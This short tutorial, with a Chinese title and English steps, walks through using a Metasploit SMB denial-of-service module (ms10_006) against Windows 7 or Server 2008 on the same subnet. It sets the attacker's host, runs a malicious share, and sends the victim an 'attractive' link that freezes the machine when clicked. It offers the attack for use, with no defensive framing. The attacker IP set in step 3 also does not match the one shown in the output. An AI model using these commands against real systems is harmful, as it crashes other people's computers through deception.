Metasploit同子网内用链接攻击win7

🔹Step 1: A Little Background Material

Remember that Metasploit has six types of modules, exploits, payloads, auxiliary, encoders, NOPs and post. In this hack, we will use an auxiliary module to attack the Windows 7 or Windows Server 2008 system's SMB.

 msf>use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop

🔹Step 2: Show Options

Now that we have selected our module, let's look at our options:

 msf> show options

As we can see , the only option we need to set is SVRHOST, which is our—the attacker's—system. In my case, it is 192.168.1.100. Yours may be different; check your IP address by typing ifconfig in a terminal.

🔹Step 3: Set SVRHOST

Next, set your SVRHOST by typing:

 msf >set SVRHOST 192.168.1.100

🔹Step 4: Run

In the last step, we run the auxiliary module and once the module executes, it generates a shared folder link which you can send to the target machine. In this case, the link is \\192.168.1.100\Shared\Anything.

msf >  run

🔹Step 5: Making an Attractive Link

 vulnerable client should try to access: \\10.233.35.144\Shared\Anything

Metasploit then starts the malicious SMB service and when the target clicks on the link, the target system will begin to run an infinite loops or Freeze.